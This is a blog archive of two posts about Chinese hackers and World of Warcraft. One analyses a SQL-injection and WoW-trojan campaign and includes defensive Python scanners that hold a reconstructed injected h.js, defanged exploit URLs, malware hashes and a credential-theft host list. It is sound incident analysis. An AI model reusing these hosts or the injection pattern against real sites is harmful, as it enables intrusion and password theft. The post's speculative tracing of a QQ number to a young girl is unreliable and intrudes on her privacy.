Tag Archive 'World of Warcraft'

Nov 10 2008

Chinese hackers will do anything for your WoW password (updated)

Trojan Horse

So the Analyst’s Diary blog at viruslist.com has an article on some new mass SQL injection attack that injects .asp pages with redirects to browser exploits. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write("");
document.write("");

WordPress won’t display the script. Basically, it loads iframes that point to two separate URLs (these URLs carry browser exploits, so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.
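The injection described above leaves two things a site owner can look for in saved page source: an external script tag that did not belong there, and document.write() calls inside that script that emit hidden iframes. The following is an added example (not code from the original post or from viruslist.com) that scans an offline copy of a page plus the script bodies it references and reports the iframe targets; the sample page and the stand-in h.js are constructed here (WordPress stripped the real script from the post), the function names are this example's own, and the URLs are written with hxxp:// so nothing in it is a live link.

```python
import re
from urllib.parse import urlparse

# Hosts the post names as serving the injected script and the browser exploits.
KNOWN_BAD_HOSTS = ("vvexe.com", "www.kenya.com")

# document.write('...') or document.write("..."), allowing escaped quotes inside the literal.
DOC_WRITE_RE = re.compile(r"document\.write\(\s*(['\"])((?:\\.|(?!\1).)*?)\1\s*\)", re.S)
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_ATTR_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def is_known_bad(host):
    """True if host is one of the listed hosts or a subdomain of one."""
    host = host.lower()
    return any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS)


def extract_iframes(js_source):
    """Return one dict per <iframe> emitted through document.write() in js_source.

    The string literal is unescaped first, so a payload written as "\\x3ciframe ..."
    is seen the way the browser would see it.
    """
    frames = []
    for _quote, literal in DOC_WRITE_RE.findall(js_source):
        try:
            markup = literal.encode("latin-1", "backslashreplace").decode("unicode_escape")
        except UnicodeDecodeError:
            markup = literal  # malformed escape: fall back to the raw literal
        for tag in IFRAME_TAG_RE.findall(markup):
            src = SRC_ATTR_RE.search(tag)
            if not src:
                continue
            host = urlparse(src.group(1)).netloc.lower()
            frames.append({
                "url": src.group(1),
                "host": host,
                "hidden": bool(HIDDEN_RE.search(tag)),
                "known_bad": is_known_bad(host),
            })
    return frames


def scan_page(html, script_bodies):
    """Report every external script in a page and the iframes that script writes.

    script_bodies maps a script URL found in the page to its already-saved text, so
    the scan runs offline against copies instead of contacting the hosts.
    """
    findings = []
    for url in SCRIPT_SRC_RE.findall(html):
        host = urlparse(url).netloc.lower()
        findings.append({"kind": "script", "url": url, "host": host,
                         "hidden": False, "known_bad": is_known_bad(host)})
        for frame in extract_iframes(script_bodies.get(url, "")):
            findings.append({"kind": "iframe", **frame})
    return findings


# Constructed sample: an ordinary .asp page with the injected tag appended to its content.
SAMPLE_ASP = """<html><body><h1>Guild roster</h1>
<script src="hxxp://www.vvexe.com/haha/h.js"></script></body></html>"""

# Constructed stand-in for h.js: two hidden iframes to the exploit pages named in the
# post, the second one lightly obfuscated with \x escapes for the angle brackets.
SAMPLE_H_JS = r'''document.write("<iframe src=\"hxxp://vvexe.com/haha/index.html\" width=0 height=0></iframe>");
document.write("\x3ciframe src=\"hxxp://www.kenya.com/faq.htm\" style=\"display:none\"\x3e\x3c/iframe\x3e");'''

if __name__ == "__main__":
    for f in scan_page(SAMPLE_ASP, {"hxxp://www.vvexe.com/haha/h.js": SAMPLE_H_JS}):
        flag = "KNOWN BAD" if f["known_bad"] else "unlisted"
        print(f'{f["kind"]:6} {f["url"]}  hidden={f["hidden"]}  {flag}')
```

On a real site the same scan would run over every page the SQL injection could have touched (the injected tag lands wherever the affected text column is rendered), and any external script host that is not one of the site's own is worth reviewing even when it is not on the known-bad list.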

Update: I spent some time looking at this malware. The two pages listed earlier in this post contain iframes to browser plug-in exploits for RealPlayer and other typical vulnerabilities. The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746, not packed/Delphi code) which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be, not packed/VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850) and cool.exe (18867d6de1a3a9241c14c22c19b51351, not packed/Delphi).

1.exe is a WoW trojan and waits for passwords sent to:

grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com. It also looks for and attempts to disable many types of security software. It attempts to send the stolen credentials to an ASP page on www.yilu777.com.
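The update above gives enough to sweep for this family on the defender's side: the four MD5s of the dropped executables, the host that serves down.txt and the follow-on files, and the host that receives the stolen credentials. This is an added example (not code from the post) that checks files against those hashes and scans proxy log lines for the two hosts; the log format is a constructed squid-style layout (timestamp, client, status, method, URL), the POST path on yilu777.com is a placeholder because the post does not give it, and the function names are this example's own. The WoW logon hosts the trojan watches are legitimate Blizzard hosts and are deliberately not on the indicator list.

```python
import hashlib
import re
from urllib.parse import urlparse

# MD5s the post gives for the dropped executables.
KNOWN_MD5 = {
    "e160f590d894a98474697ac0db987746": "down.exe",
    "a7fc8c966fdeb550fe19aba3169569be": "1.exe",
    "5af5edaa2cebf1fed56ad36799b2c850": "do.exe",
    "18867d6de1a3a9241c14c22c19b51351": "cool.exe",
}

# Hosts the post ties to the download chain and to the credential upload.
KNOWN_BAD_HOSTS = {"vvexe.com": "download chain", "yilu777.com": "credential upload"}

URL_RE = re.compile(r"https?://\S+", re.I)


def md5_bytes(data):
    return hashlib.md5(data).hexdigest()


def md5_file(path):
    """MD5 of a file, read in chunks so large files do not land in memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def match_hashes(digests_by_path, bad_hashes=KNOWN_MD5):
    """Return {path: sample name} for every digest found in bad_hashes."""
    return {path: bad_hashes[d] for path, d in digests_by_path.items() if d in bad_hashes}


def sweep_files(paths, bad_hashes=KNOWN_MD5):
    """Hash each path on disk and report the ones matching a listed sample."""
    return match_hashes({p: md5_file(p) for p in paths}, bad_hashes)


def bad_host_label(host):
    """Label for a listed host or any subdomain of one, else None."""
    host = host.lower()
    for bad, label in KNOWN_BAD_HOSTS.items():
        if host == bad or host.endswith("." + bad):
            return label
    return None


def scan_proxy_log(lines):
    """Return (line_number, client, host, label) for each line that touches a listed host."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = URL_RE.search(line)
        if not m:
            continue
        host = urlparse(m.group(0)).netloc.lower()
        label = bad_host_label(host)
        if label:
            fields = line.split()
            client = fields[1] if len(fields) > 1 else "?"
            hits.append((n, client, host, label))
    return hits


# Constructed log lines: one client fetches down.txt, then 1.exe, then posts to the
# credential host; a second client only talks to a legitimate WoW logon host.
SAMPLE_LOG = [
    "1226300000.123 192.0.2.10 TCP_MISS/200 GET http://www.vvexe.com/haha/down.txt",
    "1226300001.456 192.0.2.10 TCP_MISS/200 GET http://www.vvexe.com/haha/1.exe",
    "1226300002.789 192.0.2.10 TCP_MISS/200 POST http://www.yilu777.com/PLACEHOLDER.asp",
    "1226300003.000 192.0.2.11 TCP_MISS/200 GET http://us.logon.worldofwarcraft.com/",
]

if __name__ == "__main__":
    for n, client, host, label in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {client} -> {host} ({label})")
    # sweep_files(["/path/to/suspect.exe"]) would report any file matching KNOWN_MD5
```

A client that appears first against the download chain and shortly after against the credential host, as 192.0.2.10 does here, is the pattern to prioritise; the file sweep then confirms which of the listed executables actually landed on that machine.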

do.exe is a little more interesting. It appears to be a generic remote access trojan that sends a beacon to QQ number 58836533. A quick search for that QQ number revealed that this person’s paipai account has been frozen:

http://shop.paipai.com/58836533

So I do some more digging and find the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.


Nov 12 2007

China’s most famous hacker playing World of Warcraft

Goodwell

The Green Army was founded by a Shanghai hacker going by the online name of Goodwell; it was reported to have had a membership of around 3,000 people from Shanghai, Beijing, and Shijiazhuang. The other four key members of the group went by the pseudonyms Rocky, Dspman (HeHe), Solo, and LittleFish. It also attracted others considered to be part of China’s first generation of hackers, the likes of Xie Zhaoxia, Brother Peng, PP (Peng Quan), Tian Xing (Cheng Weishan), IceWater (Huang Lei), and Little Rong. The group disbanded in 2000, and its rise and fall was described as “confusing” by insiders who consider it one of the enduring symbols of the Chinese hacker movement. The Green Army is said to have hacked “uncountable foreign web sites.” Indeed, many of China’s top hackers were past members of this group.

So, where is he now you ask? Apparently he is spending quite a bit of time playing World of Warcraft and doing a bang-up job. In an interview with wow.duoban.com, Goodwell was congratulated for his world record breaking move from level 60 to 70 in under 24 hours. There were some details in the article about how he achieved this feat but it had a bunch of World of Warcraft stuff I don’t understand…but he did it…without hacking…he said. During the interview, which was conducted in September of 2007, he introduced himself as the founder of the Green Army Hacker Organization, Goodwell (real name Gong Wei).

Screen name: Silver Dragon

Real name: Goodwell (Gong Wei)

Occupation: Hunter

Faction: Tribe

Server: 7th Region? An Geluo

Guild: Green Base

Apparently, there were some problems when his guild (over 2,000 players) was located on the 5th Region server (unsure of the translation of servers as regions) for moving up too quickly in ranking. So, they changed their name from the Chinese for Green Army Corps to the English word Greenbase. He just can’t seem to let go of the old days…and that should scare you WoW players.
